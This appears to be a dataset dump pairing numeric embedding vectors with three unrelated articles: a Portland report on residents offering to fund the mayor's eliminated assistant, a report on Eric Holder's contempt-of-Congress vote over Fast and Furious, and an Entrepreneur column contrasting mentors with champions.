0.03431831672787666, 0.0002608506183605641, -0.06258038431406021, 0.06271372735500336, 0.01831088960170746, 0.10408088564872742, -0.00993101205676794, -0.03614131361246109, 0.04055279120802879, -0.0071283006109297276, -0.04420497268438339, 0.03987438231706619, -0.013916156254708767, 0.045925188809633255, 0.05078218877315521, 0.07321807742118835, 0.011755010113120079, -0.018522653728723526, 0.00862102210521698, 0.01754632592201233, 0.09857846796512604, 0.013715598732233047, -0.010408812202513218, 0.04887080192565918, 0.010641015134751797, -0.028155846521258354, -0.071978859603405, -0.019419362768530846, -0.03877536207437515, 0.05591462552547455, 0.04777985438704491, -0.03235279768705368, 0.01702401041984558, 0.038159433752298355, -0.052054159343242645, -0.006873989477753639, 0.09226490557193756, -0.051097165793180466, 0.06069473549723625, 0.0353514738380909, 0.01818135753273964, 0.02410864271223545, 0.10385619848966599, -0.02824990823864937, 0.04076708108186722, 0.13204078376293182, 0.02693967893719673, -0.04066429287195206, -0.09193981438875198, 0.0634271502494812, 0.06337687373161316, 0.05189121514558792, -0.013021942228078842, -0.013529679737985134, 0.013243268243968487, -0.00041530310409143567, 0.03767998144030571, -0.023464148864150047, 0.07318408787250519, -0.049967456609010696, 0.08954863995313644, -0.0254342183470726, 0.016412869095802307, -0.04998955875635147, -0.0483781136572361, -0.08471265435218811, 0.05019247531890869, -0.1566755622625351, -0.01651473343372345, 0.07869232445955276, -0.059123046696186066, -0.038613345474004745, 1.9959418369092343e-33, 0.09254004806280136, -0.017454059794545174, -0.11439476907253265, -0.01415296271443367, 0.052638038992881775, 0.023412760347127914, 0.014120708219707012, 0.0036833935882896185, -0.09045606851577759, 0.09984904527664185, -0.024364201352000237, -0.021216442808508873, 0.07364827394485474, -0.054050665348768234, 0.02562110312283039, 0.02512100525200367, -0.005688888486474752, -0.04296204075217247, -0.009708716534078121, 0.06443901360034943, 0.06435014307498932, -0.02422988973557949, -0.08699648082256317, -0.020251493901014328, -0.039305370301008224, 0.17633695900440216, -0.007606316823512316, -0.039863429963588715, -0.07542406022548676, -0.005772052798420191, -0.07733948528766632, 0.0067147910594940186, 0.019534042105078697, -0.0053436947055161, 0.04972054809331894, -0.08192647993564606, 0.08944758027791977, 0.016293669119477272, -0.09728408604860306, -0.02705218642950058, 0.02900787815451622, 0.1094919964671135, -0.10627151280641556, -0.058090802282094955, 0.024665603414177895, -0.05614858493208885, 0.007272195070981979, 0.07164081186056137, 0.0072488379664719105, -0.07601039111614227, -0.05293154716491699, 0.04061960056424141, 0.055540431290864944, -0.03339099511504173, -0.004091574344784021, 0.01042778231203556, 0.029328307136893272, 0.07549946010112762, 0.034210238605737686, 0.06143000349402428, -0.021636778488755226, 0.012909919954836369, -0.0450790673494339, 0.08262480795383453, -0.05309618264436722, -0.07907749712467194, -0.04686884209513664, -0.012640911154448986, -0.07348823547363281, -0.022709600627422333, -0.0017143808072432876, 0.0005044442368671298, -0.04595787078142166, -0.02369304560124874, 0.04723536595702171, -0.04961680620908737, -0.0116750318557024, 0.09199438244104385, 0.020721498876810074, 0.03028283454477787, -0.03728697821497917, 0.007624500896781683, -0.03292069956660271, 0.023127082735300064, 0.0007973987958393991, -0.02960323356091976, -0.0011070792097598314, -0.05392206087708473, 0.006065377499908209, 0.09348229318857193, -0.03093990869820118, -0.021116646006703377, 0.005750277079641819, -0.023224487900733948, 0.06185669079422951, -2.8585785499311624e-33, -0.016464026644825935, 0.03442303091287613, -0.002162341261282563, 0.023518109694123268, 0.04656889662146568, -0.024035081267356873, -0.03944346308708191, 0.10305532068014145, 0.011296696029603481, -0.12440799176692963, 0.07247921824455261, -0.03756183385848999, -0.048412520438432693, -0.002617544960230589, 0.0029534928034991026, 0.0019616056233644485, 0.013533933088183403, -0.007092682644724846, -0.039203010499477386, -0.00478123314678669, 0.06077154725790024, -0.0013368839863687754, -0.06003245338797569, -0.015844156965613365, 0.027261242270469666, 0.054581452161073685, 0.052721671760082245, 0.017240112647414207, -0.08115183562040329, 0.01287552434951067, -0.07226654142141342, -0.08527649939060211, 0.00958434958010912, 0.016461173072457314, -0.01863228902220726, 0.07499703764915466, -0.019320739433169365, 0.11343676596879959, 0.03749222680926323, 0.04887719452381134, 0.00800243765115738, 0.04767398536205292, -0.10682220011949539, 0.03229470178484917, 0.0004925043322145939, 0.002365667140111327, 0.010915214195847511, -0.01534377783536911, -0.0015756189823150635, -0.004114110954105854, 0.013491027057170868, -0.03569731116294861, -0.05067100375890732, 0.02208581008017063, 0.02602224051952362, -0.03549690544605255, 0.013276156038045883, -0.03867345675826073, -0.06762732565402985, -0.0062242173589766026, -0.055900588631629944, 0.08851149678230286, -0.0034231978934258223, -0.009420106187462807, 0.047194868326187134, 0.05961275473237038, -0.02475639618933201, 0.0010905410163104534, 0.004657493904232979, 0.06013883277773857, 0.030413616448640823, 0.026599787175655365, -0.03017677366733551, 0.07230684906244278, 0.018518278375267982, 0.0891251489520073, 0.03262980282306671, 0.0006448858766816556, -0.03461788222193718, 0.02751987800002098, -0.013991056010127068, -0.03748480975627899, -0.03663450852036476, -0.008208570070564747, 0.0893298014998436, 0.13212785124778748, -0.053484734147787094, -0.020302634686231613, 0.03129730373620987, -0.04207845404744148, 0.005591497756540775, 0.010667114518582821, -0.043687853962183, -0.05541686713695526, -0.017435848712921143, -5.416312376382848e-8, -0.11561523377895355, -0.017726164311170578, -0.1175902932882309, 0.02521810680627823, -0.072262242436409, 0.056028395891189575, -0.025605525821447372, -0.06269822269678116, 0.0005761586362496018, 0.07114361226558685, 0.10230936855077744, 0.06124700978398323, 0.022407349199056625, -0.07457408308982849, -0.03369637951254845, -0.033918965607881546, -0.05190657079219818, 0.019966963678598404, -0.03960587829351425, -0.0062141274102032185, -0.04382820054888725, -0.015977736562490463, -0.00552172027528286, -0.011534987017512321, 0.07995008677244186, -0.06243729591369629, -0.07682094722986221, 0.03383022919297218, 0.04821028187870979, 0.039630990475416183, -0.002617151942104101, 0.0019958605989813805, -0.06598186492919922, -0.002717446768656373, 0.0442209355533123, -0.045992396771907806, -0.003464793087914586, -0.026902271434664726, 0.005422141402959824, -0.019556935876607895, -0.00902096088975668, 0.018505319952964783, 0.01889357902109623, 0.007891218177974224, -0.035774800926446915, -0.11088420450687408, -0.048365600407123566, 0.025277113541960716, 0.051173947751522064, -0.08370199799537659, -0.02334054931998253, -0.10471269488334656, -0.015340136364102364, -0.021793723106384277, 0.024928681552410126, 0.02845774218440056, -0.0210558008402586, -0.12346729636192322, -0.040043678134679794, 0.011907089501619339, -0.0031925574876368046, -0.15005764365196228, -0.03848308324813843, 0.017270678654313087 ]
A small group of Portland residents is offering to raise money to fund the special assistant to the mayor after it was eliminated from the budget by the City Council. But the city manager says that the effort would likely be rebuffed, since the council has already deemed the position to be unnecessary. Peaks Island resident Timmi Sellers asked the city in a May 18 email how residents could earmark a donation to pay for Jason Shedlock’s salary, which would have been roughly $69,000 next year. Jason Shedlock, assistant to the mayor, speaks to the council before its vote terminating his position this month. He said that listening to people talk about him was like "watching your own funeral." Staff photo by Derek Davis Related Headlines Portland Mayor Strimling says he may veto budget over council’s vote to cut his assistant Sellers, who was impressed that Mayor Ethan Strimling and Shedlock recently attended a meeting on Peaks Island to hear concerns about the loss of mainland parking, said in an interview that she was moved to act after watching the emotional debate leading up to the City Council’s May 15 vote. “I was pretty shocked at the viciousness of the personal attacks on the mayor after he explained very carefully why the position was so important to him,” she said. “I had voted for the mayor’s position and I want it to be successful. I consider one year a short time for this to be evaluated.” Sellers said she and a few other neighborhood leaders, who she declined to identify, were interested in raising money, but wanted to first check with the city about the legality before launching the effort. Residents are allowed make donations to the city. According to the City Council’s rules, donations in excess of $5,000 must be accepted and appropriated by the council, which voted 6-3 to eliminate the position, partly because it was unpopular with their constituents. “The Council’s decision to eliminate the funding for the position was not because the City could not afford it, but because they felt that the position was redundant and no longer necessary in its current capacity,” City Manager Jon Jennings said in an email to Sellers. “Given their decision above, it does not seem likely to me that they would accept a donation for this purpose, and I take my direction from them.” After receiving the city’s response, Sellers said Wednesday she would be meeting with family, friends and some neighborhood organizations next week to figure out their next steps. “I think in some format we will be moving forward. In some way we will be trying to assist in the healing of our dysfunctional government,” Sellers said. “I don’t know if raising money and forcing the City Council to look at this again will be helpful and I want to be helpful.” The elimination of the mayor’s assistant marked what may be a new low in the relationship between the council and Strimling, who said the cut “undermines democracy” by hindering his ability to respond to constituents and draft new city policies, among other tasks. City Councilor Spencer Thibodeau said the position had prevented Strimling from collaborating with councilors, whose support is needed to enact his initiatives. But Strimling said eliminating the position would only “make it worse.” The idea of eliminating the position emerged late in the budget process. Strimling considered vetoing the entire $240 million city budget over the position but announced Monday that he would not do so, because it would foster “political maneuvering, grandstanding and infighting and will only serve to further divide our city.” Instead, Strimling called on the council to form a task force to review the City Charter and offer recommendations about ways to make the mayor’s office more effective. That idea was immediately shot down by some councilors, who noted that the city has had two legal reviews of the charter, including one that cost nearly $22,000, explaining the mayor’s role. Randy Billings can be reached at 791-6346 or at: [email protected] Twitter: @randybillings Share
[ -0.03845356032252312, 0.0464228019118309, 0.08279678225517273, 0.004389132373034954, 0.0040131378918886185, -0.005508563481271267, 0.07775598764419556, 0.007753171492367983, -0.025694437325000763, 0.01588473841547966, 0.0485863983631134, -0.042298607528209686, -0.016088252887129784, -0.03688652440905571, 0.0055730827152729034, 0.0400683619081974, 0.04077467322349548, 0.043835461139678955, -0.05996014177799225, 0.01943903975188732, 0.034918807446956635, 0.012344744987785816, -0.017576737329363823, -0.0006298073567450047, 0.07180977612733841, -0.028493043035268784, -0.012545502744615078, 0.00324807595461607, -0.013878940604627132, 0.004927610978484154, -0.014094587415456772, -0.0707620233297348, 0.04238290712237358, -0.009918334893882275, 0.074906125664711, 0.05048033595085144, 0.04943491518497467, -0.0006877330597490072, -0.04101146385073662, 0.025515973567962646, 0.009077170863747597, -0.003802298568189144, -0.06951383501291275, -0.027619818225502968, -0.1650599241256714, -0.05476011335849762, 0.10933136194944382, 0.015648428350687027, -0.05263908952474594, -0.0595160573720932, 0.017950376495718956, 0.006716637406498194, 0.043152082711458206, -0.1097998097538948, -0.017139093950390816, 0.0396278016269207, 0.0347743034362793, 0.04535805433988571, 0.04391276836395264, -0.04156636446714401, 0.04672762379050255, -0.02177337557077408, -0.08895958960056305, -0.00020695470448117703, 0.07682084292173386, 0.03403938561677933, -0.028668619692325592, -0.05255736783146858, 0.044460564851760864, -0.07075141370296478, 0.1174999326467514, -0.01105127576738596, 0.03033536486327648, -0.06510931998491287, 0.04362630844116211, 0.012633188627660275, 0.019547725096344948, 0.017266973853111267, 0.007536950055509806, 0.02798573300242424, 0.028648879379034042, -0.06923112273216248, -0.03327539563179016, -0.03305056691169739, -0.013781952671706676, -0.002731689950451255, -0.0068859802559018135, 0.0050411890260875225, -0.0020667235367000103, 0.028776386752724648, 0.0015626732492819428, 0.017330585047602654, -0.002380841411650181, -0.04866970703005791, 0.025311743840575218, 0.02039141207933426, -0.04523508995771408, 0.05623805150389671, -0.08719630539417267, 0.08367210626602173, -0.06876073777675629, 0.03942885622382164, -0.02352597750723362, -0.07975955307483673, 0.09749873727560043, -0.06751491874456406, -0.027065901085734367, -0.04267784580588341, -0.03422430157661438, 0.006580438930541277, -0.06047608703374863, -0.03016488067805767, -0.042358532547950745, 0.03752664104104042, 0.05532878264784813, 0.087558314204216, -0.013822915963828564, 0.06604770570993423, -0.009218155406415462, -0.05225813016295433, 0.09809672087430954, 0.002528863726183772, -0.07793736457824707, 0.033248718827962875, 0.03297800198197365, -0.0026210409123450518, -0.007576394826173782, 7.559128921445513e-34, 0.04914173111319542, 0.08809469640254974, -0.020200183615088463, 0.01736481674015522, 0.09234265983104706, -0.03031863085925579, 0.00231151026673615, -0.06656302511692047, 0.011668873019516468, 0.037368882447481155, 0.008992595598101616, -0.017642397433519363, 0.06818345934152603, 0.01675277389585972, -0.02291191928088665, 0.013558224774897099, 0.06999243795871735, 0.010906737297773361, -0.029506603255867958, -0.039448659867048264, 0.09459944814443588, 0.02614349126815796, -0.02344219572842121, 0.0083691431209445, -0.10502059012651443, -0.07451879978179932, 0.035038214176893234, 0.01518088299781084, 0.11228001862764359, 0.013162782415747643, -0.10994428396224976, 0.08173823356628418, 0.10664613544940948, -0.009781303815543652, 0.0480816476047039, 0.018171293660998344, -0.026121770963072777, -0.03910382091999054, -0.008334308862686157, -0.061538320034742355, -0.03318387269973755, -0.000921042577829212, -0.016231082379817963, 0.0011537811951711774, -0.06990443915128708, -0.04445682466030121, -0.003163651330396533, -0.04935317113995552, -0.05713910236954689, -0.009088274091482162, 0.1193162202835083, 0.04458194971084595, -0.012496141716837883, 0.07493442296981812, -0.05878360942006111, -0.052878137677907944, 0.030882306396961212, -0.03216028958559036, 0.060372449457645416, 0.04742999002337456, 0.07434681057929993, 0.05048408731818199, 0.05117521435022354, 0.03289610520005226, -0.07598451524972916, -0.08590489625930786, 0.004793248139321804, 0.046102125197649, 0.05339529365301132, -0.04686698690056801, -0.007690368220210075, 0.038545090705156326, 0.030539635568857193, 0.023039817810058594, -0.10152182728052139, 0.001956759952008724, -0.016062581911683083, 0.04293106496334076, 0.018348556011915207, -0.017191588878631592, 0.12509459257125854, -0.0707397609949112, 0.019417712464928627, -0.060063332319259644, -0.03599854186177254, -0.054583583027124405, -0.0031096413731575012, -0.010004952549934387, 0.033161893486976624, 0.038448501378297806, -0.0321129709482193, -0.05345078930258751, -0.02017252892255783, -0.009820377454161644, -0.015565497800707817, -3.521866298404008e-33, -0.0024848219472914934, -0.0790875107049942, 0.0052267140708863735, -0.10900914669036865, -0.014387311413884163, -0.02680067904293537, -0.028467519208788872, -0.05987080931663513, 0.00271997251547873, -0.06620445102453232, -0.10552901774644852, 0.0061256312765181065, -0.000024481732907588594, 0.08887426555156708, -0.03975733742117882, 0.020721474662423134, 0.07001923024654388, -0.061382945626974106, -0.003737053135409951, -0.049836717545986176, 0.059268560260534286, 0.015146658755838871, -0.10612953454256058, 0.07378696650266647, -0.0436193123459816, -0.04308758303523064, -0.0037929629907011986, 0.015280195511877537, -0.03468746319413185, -0.03306054323911667, -0.016247538849711418, -0.008540629409253597, -0.05042683705687523, 0.029669923707842827, -0.018658841028809547, 0.0576072596013546, -0.020409734919667244, -0.03161279857158661, 0.02092265523970127, 0.00663247425109148, 0.07633912563323975, -0.08772535622119904, 0.04627412557601929, 0.0025926243979483843, 0.06878602504730225, -0.025284821167588234, 0.05926557630300522, -0.10119788348674774, -0.05645432323217392, -0.025269165635108948, -0.01642531156539917, 0.09347542375326157, -0.06009994074702263, 0.11650273203849792, 0.031363703310489655, 0.08067897707223892, 0.04107382521033287, -0.02845916524529457, 0.02495771460235119, -0.06654509156942368, -0.0012505176709964871, -0.01761731691658497, -0.02453533001244068, 0.027002530172467232, 0.04148364067077637, -0.09232556074857712, 0.02069050446152687, -0.21266411244869232, -0.04753316566348076, -0.023852359503507614, 0.015270274132490158, -0.08837715536355972, -0.004761837888509035, -0.02660311385989189, -0.028037967160344124, 0.02104620821774006, -0.03555590286850929, 0.0457509383559227, -0.05396120995283127, 0.0015754237538203597, -0.030646052211523056, -0.11191464960575104, -0.021222705021500587, 0.012713884003460407, 0.08258245140314102, 0.025752076879143715, 0.09974828362464905, -0.009809495881199837, 0.011027086526155472, -0.02040805295109749, -0.04612436890602112, -0.05851629376411438, 0.015680264681577682, -0.004479551687836647, -0.0004567394789773971, -5.819124027084399e-8, 0.02366761304438114, 0.03436940908432007, -0.12296511232852936, 0.03279389068484306, 0.06715374439954758, 0.054785288870334625, -0.001719963038340211, 0.028740957379341125, -0.044082801789045334, 0.06503161787986755, 0.03771020844578743, -0.03112189657986164, -0.09347635507583618, -0.018781142309308052, 0.012900453060865402, -0.0017152426298707724, 0.019229896366596222, -0.010839798487722874, -0.024131808429956436, -0.02321438491344452, -0.042162247002124786, 0.06888031959533691, -0.04847017303109169, 0.07181801646947861, -0.020069342106580734, -0.029537536203861237, 0.0005749783595092595, 0.12705561518669128, 0.017735827714204788, 0.048432398587465286, -0.03566303104162216, 0.025738149881362915, -0.052308712154626846, -0.018293673172593117, 0.03504088521003723, 0.04901273921132088, 0.03644256666302681, 0.07418253272771835, 0.053390029817819595, 0.05863335728645325, 0.0014498382806777954, -0.03087460622191429, -0.0010020917980000377, 0.05521155148744583, 0.022983357310295105, 0.03798021376132965, -0.0018291524611413479, -0.004839504603296518, 0.029828360304236412, -0.002629854716360569, -0.0006838070694357157, -0.04244524613022804, -0.04920296370983124, 0.0877910926938057, 0.0634271651506424, -0.0452599972486496, -0.09153341501951218, 0.03648551553487778, -0.0366310253739357, 0.05508376657962799, -0.016090787947177887, -0.04971078783273697, -0.12198083847761154, -0.021981846541166306 ]
Media playback is unsupported on your device Media caption "An unnecessary court conflict will ensue" US Attorney General Eric Holder has been held in contempt of Congress for refusing to hand over a set of files on a failed gun-running investigation. In a 255-67 vote, 17 Democrats joined with the House of Representatives' Republican majority. Mr Holder is the first sitting attorney general and US presidential cabinet member to be held in contempt. The White House has refused to hand over files outlining how problems with Fast and Furious emerged. The operation saw US agents lose track of hundreds of illegal guns sold in Arizona and allowed into Mexico to target dealers. Two of the weapons were found in December 2010 at the scene of a US border agent's murder. Fast and Furious ended in early 2011. 'Political game' Mr Holder told reporters that the vote was "misguided" and said lawmakers had been circulating "truly absurd" conspiracy theories. "It will not distract me from the important tasks that are our responsibility," Mr Holder said. Image caption Dozens of House Democrats, including leader Nancy Pelosi, walked out The House also voted 258-95 to ask the courts to force Mr Holder to turn over the documents. Many Democratic lawmakers, including the Congressional Black Caucus and Democratic leader Nancy Pelosi, walked out of the chamber in protest on Thursday. "We don't want to play a part in this political game," Democratic Representative Gregory Meeks said. The roots of the current Congressional investigation began on 4 February 2011 when the justice department sent lawmakers a letter denying they had sanctioned or otherwise knew about guns illegally ending up Mexico. The department withdrew the letter 10 months later, acknowledging the operation had allowed guns across the border. Led by Republican Darrell Issa, the House Oversight Committee subpoenaed documents for the 10-month period. The Department of Justice says it has denied access to the files because they contain information that could affect ongoing criminal investigations. Demand for answers Mr Issa did not accept an offer of files and a briefing on the operation, saying the department needed to hand over all the documents requested. Image caption Eric Holder spoke to a civic group in Florida before the contempt vote The justice department sent to the House Oversight Committee more than 7,000 documents relating to Fast and Furious, and to a similar operation that took place during the George W Bush administration. Last week, the White House raised the stakes by announcing it would exert executive privilege to protect the documents in question from subpoena. The National Rifle Association has told House members that it will include the contempt vote in ratings the lobby group uses to show how lawmakers align with its interests. Dan Pfeiffer, White House communications director, called the vote a "transparently political stunt" that happened despite justice department efforts to accommodate Congress. Republican leaders defended the vote. House Speaker John Boehner said during the House debate that "no justice department is above the law". "A man died serving his country and we have a right to know what the federal government's hand was in that," said Republican lawmaker Rich Nugent.
[ -0.0016143686370924115, 0.0063514262437820435, -0.024087047204375267, -0.04789283871650696, 0.031354472041130066, 0.06794337183237076, 0.024498360231518745, -0.04723962023854256, 0.011862857267260551, -0.0032538892701268196, 0.07252401113510132, 0.171499103307724, 0.07771192491054535, -0.019708693027496338, -0.01747756637632847, 0.0004241002316121012, 0.09087418019771576, -0.022686656564474106, 0.0020462118554860353, 0.10210210829973221, -0.028179846704006195, -0.017167972400784492, 0.020119639113545418, -0.010799850337207317, -0.016082793474197388, 0.0023909322917461395, -0.050064124166965485, 0.05989188328385353, -0.05187834054231644, -0.06275412440299988, 0.0616035982966423, -0.06319476664066315, -0.09518221765756607, 0.01933934912085533, 0.02730797603726387, -0.08713068813085556, 0.01795593835413456, -0.08507237583398819, 0.051322516053915024, -0.04377702251076698, 0.03360769897699356, -0.0010827586520463228, -0.010245174169540405, -0.008622183464467525, 0.03919804468750954, -0.023013867437839508, 0.03117354027926922, 0.03515080362558365, 0.004526009317487478, -0.026366809383034706, -0.12326480448246002, 0.05506160110235214, -0.03130573406815529, 0.051542557775974274, 0.06229453533887863, -0.09494728595018387, -0.0009699619840830564, 0.07766325026750565, 0.035825882107019424, 0.019258791580796242, 0.008500545285642147, -0.06173400208353996, 0.034659650176763535, 0.013587157242000103, -0.037067562341690063, 0.036022964864969254, 0.022860683500766754, -0.07049954682588577, 0.034129947423934937, 0.0034459372982382774, 0.021371055394411087, 0.09189552813768387, 0.03958658128976822, -0.0053268237970769405, -0.04625595733523369, -0.06488437950611115, 0.028176482766866684, 0.07437971234321594, 0.016426067799329758, -0.10268612951040268, 0.04958150535821915, -0.0793093666434288, -0.05951230227947235, -0.057260818779468536, 0.01627657376229763, 0.005798805970698595, -0.027848506346344948, 0.015308859758079052, -0.046735744923353195, -0.014427820220589638, 0.0009626325918361545, -0.0030458855908364058, 0.11725230515003204, -0.018325917422771454, 0.10596764832735062, -0.03627743571996689, 0.000641776598058641, 0.007898815907537937, -0.023903897032141685, 0.03528745472431183, 0.0036724284291267395, 0.045759912580251694, -0.03329559043049812, -0.03945794329047203, -0.00564288767054677, 0.009922879748046398, 0.025500932708382607, 0.03777288272976875, -0.06464443355798721, -0.01693810150027275, -0.027343859896063805, 0.08361950516700745, 0.01328048761934042, 0.017906567081809044, 0.00025831692619249225, -0.022204259410500526, -0.02602682076394558, 0.06064466014504433, -0.05029530078172684, -0.042174264788627625, -0.01605498231947422, 0.027838485315442085, -0.09822532534599304, 0.0012595000443980098, 0.09547176212072372, 0.014512447640299797, -0.008366116322577, 2.5863880575524615e-33, 0.06143726408481598, -0.03772648423910141, -0.045479148626327515, 0.004517838358879089, 0.009983761236071587, 0.07025649398565292, 0.03622658923268318, -0.010022357106208801, -0.01658577099442482, 0.07225929945707321, 0.003540503792464733, -0.04570234939455986, -0.0722554475069046, 0.02729872055351734, -0.030830923467874527, -0.059925809502601624, -0.08008188009262085, 0.03991156443953514, -0.019117122516036034, -0.07132367789745331, 0.029399942606687546, -0.08346398174762726, 0.00860133022069931, 0.07579389959573746, 0.032159700989723206, 0.06688030809164047, 0.02187870442867279, 0.013271916657686234, 0.039593398571014404, 0.005490461364388466, -0.09787052124738693, 0.014712534844875336, 0.053107328712940216, 0.024710968136787415, 0.0385727733373642, -0.04860791936516762, -0.03867573291063309, -0.03507545217871666, -0.0254844818264246, -0.019162574782967567, 0.038636062294244766, 0.04553023725748062, -0.024187257513403893, -0.02748667262494564, -0.11646971106529236, -0.055520303547382355, 0.007517201825976372, 0.03888968378305435, -0.036196205765008926, -0.041074611246585846, 0.021988509222865105, 0.04042636603116989, 0.08697433024644852, 0.04995092377066612, -0.03829047828912735, 0.01170390285551548, -0.03225407376885414, -0.03711043670773506, 0.03709779679775238, -0.035374823957681656, 0.034250833094120026, 0.1607222557067871, -0.002128009218722582, 0.07427568733692169, -0.12521414458751678, -0.004347345791757107, -0.05396197736263275, -0.004937630612403154, 0.056800346821546555, 0.06473079323768616, 0.05964704975485802, -0.06028247997164726, 0.0048089828342199326, -0.08730417490005493, 0.010769198648631573, -0.0026198425330221653, -0.02705247513949871, -0.060004912316799164, 0.07466228306293488, -0.0635562390089035, -0.07106968760490417, -0.05597623810172081, 0.16949664056301117, 0.033764757215976715, -0.055101428180933, 0.01804175414144993, -0.03671841695904732, -0.10444909334182739, 0.01104687713086605, -0.013550059869885445, -0.09095060080289841, -0.004624130669981241, 0.03865022584795952, 0.03453139588236809, -0.03231334686279297, -4.976111134766554e-33, -0.1108202412724495, -0.10644286125898361, 0.0010978038189932704, 0.0235923882573843, 0.010907413437962532, -0.00452372245490551, -0.05954713746905327, -0.044390998780727386, 0.05529056489467621, -0.0847034603357315, -0.028704658150672913, 0.02284851111471653, -0.036444276571273804, 0.017051905393600464, 0.018600400537252426, -0.035538312047719955, 0.061352670192718506, -0.08445198833942413, 0.047264378517866135, 0.007764177862554789, 0.0038858503103256226, 0.03490140661597252, 0.06377994269132614, 0.12224889546632767, 0.027561629191040993, 0.014270054176449776, 0.17086495459079742, -0.12717531621456146, 0.03188583627343178, -0.002504925709217787, -0.010153518058359623, -0.06528738886117935, -0.048027217388153076, 0.005701654125005007, -0.00514476653188467, 0.00128450698684901, -0.031734876334667206, -0.037296704947948456, -0.056274209171533585, -0.009941786527633667, 0.06660133600234985, 0.051205847412347794, -0.0686783492565155, 0.04022476449608803, -0.07743287086486816, -0.027785107493400574, 0.04837340861558914, 0.013271892443299294, 0.004838377237319946, 0.043472062796354294, -0.05963077023625374, 0.03214971348643303, 0.026597196236252785, 0.011649473570287228, -0.025689203292131424, 0.006432145368307829, 0.025159189477562904, -0.05510890111327171, 0.052653394639492035, 0.04101323336362839, -0.007579028140753508, 0.038399722427129745, -0.04336841404438019, -0.06641364097595215, 0.044080402702093124, 0.037101853638887405, -0.029147598892450333, -0.05670503154397011, 0.05921537056565285, 0.002422422170639038, 0.03512861952185631, -0.0575467050075531, -0.06030347943305969, -0.001165261142887175, 0.03550715371966362, 0.06285245716571808, -0.10207919776439667, 0.04542968049645424, -0.04550600424408913, 0.04496116563677788, 0.0488734096288681, -0.046430956572294235, -0.02719133347272873, -0.0072784218937158585, -0.0075751785188913345, 0.06956406682729721, -0.008358833380043507, -0.05222316458821297, -0.006415564566850662, 0.07279178500175476, -0.012312273494899273, -0.03440510109066963, 0.06696578860282898, -0.025756418704986572, -0.0851598009467125, -5.891099164045954e-8, -0.012168178334832191, 0.029457595199346542, 0.03801410645246506, 0.0030705411918461323, -0.04207949712872505, -0.015434895642101765, -0.02423929236829281, 0.046040862798690796, 0.016221173107624054, -0.012151041068136692, 0.14247867465019226, -0.11352159082889557, -0.021281972527503967, -0.020083259791135788, -0.04539022222161293, -0.007187260780483484, 0.0072182705625891685, 0.03864021971821785, -0.06487991660833359, 0.016888990998268127, 0.019973240792751312, 0.003386678406968713, -0.015786385163664818, 0.01540723443031311, 0.046317849308252335, -0.006973537616431713, -0.08536750823259354, -0.022529305890202522, 0.0006676226039417088, 0.05510522425174713, -0.1154470294713974, -0.0059786331839859486, -0.056992676109075546, -0.012691198848187923, -0.02389632537961006, 0.029071886092424393, 0.04929402843117714, 0.024834584444761276, 0.031808000057935715, 0.012337136082351208, -0.03699455037713051, -0.006919314619153738, 0.06366875767707825, -0.001313866232521832, -0.07661314308643341, -0.043477125465869904, -0.03653385490179062, -0.01748533546924591, 0.06247856095433235, 0.002392810070887208, 0.006132201757282019, -0.00795388501137495, -0.07921095192432404, 0.05291933938860893, 0.0734347477555275, 0.04717349633574486, 0.07000945508480072, -0.08251630514860153, 0.004597184248268604, -0.03775640204548836, -0.015119916759431362, -0.014290708117187023, -0.029022347182035446, 0.045103516429662704 ]
November 16, 2015 5 min read Opinions expressed by Entrepreneur contributors are their own. The idea of mentoring in the workplace is a common one, but the idea of a champion is rarely ever mentioned. In the past several months, I have been invited to speak around the topic of leadership in startups and technology, and when I mention that what we need are more champions and less mentors, people get excited. The energy level in the room suddenly rises. Most people say to me, “I’ve never heard that before. I love that idea -- champion!” Related: 6 Smart Techniques to Connect With Influential People Mentors are a dime a dozen. Mentors are typically loose connections, and there are plenty to go around. Let’s do a quick, very unscientific poll. Based on my network on LinkedIn, I have 308,830 mentors in my network. I did the same search for champion, and I had 40,317 champions. Mentors are easier to come by these days. Some organizations have formal processes for matching mentors. I’ve only engaged in this type of formal matching once, and I was assigned a Harvard professor who was an expert in nuclear terrorism. Let’s just say that we did not have much in common, but I was very grateful for the time I spent with someone so brilliant. It is best that you try to seek mentors whose expertise you can leverage. Don’t be shy about reaching out to these people directly without a formal process in place. One way to start is to ask them a question about their own career progression. And do not take it personally if they do not respond. People are busy. Mentors are usually passive. Don’t expect your mentor to become your champion. Champions are supposed to be rare. They are rare because in my experience, most people have never heard of a champion. This post aims to change this by making people aware of the concept of a champion. Think of a champion as a mentor but with a little more skin in the game. They are actively seeing that you get the good projects at work, that you receive the proper recognition for your job, and they provide you with timely feedback so that you are constantly improving. It’s a working partnership where you are essentially groomed for a particular position or role. A champion is your voice when you are not around. Mentors may give you time, advice and sometimes they are willing to make a few introductions. Don’t get me wrong, this is great, but what distinguishes a mentor and champion is that a champion is willing to take more of a risk on you. Related: Success Is Likelier When You Make People Happy They Helped You Champions are earned. You cannot just waltz into a new job or career and ask for someone to be your champion. When I started my career on Wall Street, I did not know what I was doing. I had a journalism degree, and my first day on the job I had to build a financial model from scratch. My senior associate would have rather worked with anyone else but me. The reality is that there is no time to train on the job on Wall Street. You have a deliverable in 24 hours, and there is no time to teach someone how to do things. Like a startup -- it’s sink or swim. I was left with only one choice: Forgo sleeping that night and make it happen. I did not allow mistakes and setbacks (not saving my model and having it crash, losing hours of work) mess with my confidence. I finally earned my senior associate’s trust after one year of working 80 hour weeks side-by-side. I eventually became someone he could take into battle with him and deliver. It has been 17 years, and he is one of my greatest champions and was an investor in my first startup. Be wary of the professional mentor. Some people mentor to pad their resume. When I see people put it on their LinkedIn bio, I cringe a little. My personal philosophy may not be popular, but I feel a mentor should selflessly help others and not try to gain anything other than serving. I rather have someone else call me their mentor, than call myself a mentor. For me it’s not a job -- it’s a role I play in people’s lives. The same way we don’t add mother, father, son, daughter, public servant to LinkedIn, I don’t add the title mentor to LinkedIn. So how do you get started finding a champion? You don’t. A champion finds you. They see the fire in your belly and the determination in your eyes. They’ve seen you perform, fail and keep trying. They know they can take a personal risk, because they know you will not let them down. In every single case where I have had a champion, that person believed in me long before I ever believed in myself. Related: Coaching Makes All the Difference
